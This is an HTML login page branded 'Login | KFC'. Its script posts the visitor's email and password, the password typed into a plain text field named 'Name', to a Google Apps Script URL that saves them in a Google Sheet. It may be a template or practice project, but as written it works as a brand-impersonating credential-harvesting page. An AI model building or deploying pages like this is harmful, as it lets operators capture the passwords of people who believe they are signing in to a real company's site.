<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login | KFC</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            font-family: sans-serif;
            background: #111; 
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .login-box {
            background: #222;
            padding: 40px;
            border-radius: 15px;
            box-shadow: 0 5px 25px rgba(0,0,0,0.5);
            text-align: center;
            width: 300px;
            border: 1px solid #333;
        }

        .login-box h2 {
            color: #fff;
            margin-bottom: 30px;
            text-transform: uppercase;
            letter-spacing: 2px;
        }

        .input-field {
            width: 100%;
            padding: 10px 0;
            font-size: 16px;
            color: #fff;
            margin-bottom: 30px;
            border: none;
            border-bottom: 2px solid #fff;
            background: transparent;
            outline: none;
        }

        .input-field::placeholder {
            color: #ccc;
        }

        .login-btn {
            background: #ff0000;
            color: #fff;
            border: none;
            padding: 10px 20px;
            border-radius: 40px;
            font-size: 16px;
            font-weight: 600;
            cursor: pointer;
            transition: 0.3s;
            text-transform: uppercase;
            letter-spacing: 1px;
            width: 100%;
        }

        .login-btn:hover {
            background: #d60000;
        }
        
        .back-link {
            display: block;
            margin-top: 15px;
            color: #666;
            text-decoration: none;
            font-size: 0.9em;
        }
        .back-link:hover {
            color: #fff;
        }
    </style>
</head>
<body>

    <div class="login-box">
        <h2>Member Login</h2>
        <form name="submit-to-google-sheet">
            <input type="text" name="Email" class="input-field" placeholder="Email" required>
            
            <input type="text" name="Name" class="input-field" placeholder="Password" required>
            
            <button type="submit" class="login-btn">Sign In</button>
        </form>
        <a href="index.html" class="back-link">Back to Home</a>
    </div>

    <script>
        // 1. Paste your Google Web App URL inside the quotes below
        const scriptURL = 'https://script.google.com/macros/s/AKfycbxPrKfjDvAPxlH4DyN-lb9nJdw0phmVK1p5jV6HFvAhY2zMeZMWiSaXBcC_tgvm0UyEVA/exec'
        
        const form = document.forms['submit-to-google-sheet']

        form.addEventListener('submit', e => {
            e.preventDefault()
            // Show loading state (optional)
            const btn = document.querySelector('.login-btn');
            const originalText = btn.innerHTML;
            btn.innerHTML = "Processing...";

            fetch(scriptURL, { method: 'POST', body: new FormData(form)})
                .then(response => {
                    alert("Success! Your data is saved to Google Sheets.");
                    // Reset button
                    btn.innerHTML = originalText;
                    // Clear form
                    form.reset();
                    // Optional: Redirect after successful login
                    // window.location.href = "welcome.html";
                })
                .catch(error => {
                    console.error('Error!', error.message);
                    alert("Something went wrong. Check console.");
                    btn.innerHTML = originalText;
                })
        })
    </script>
</body>
</html>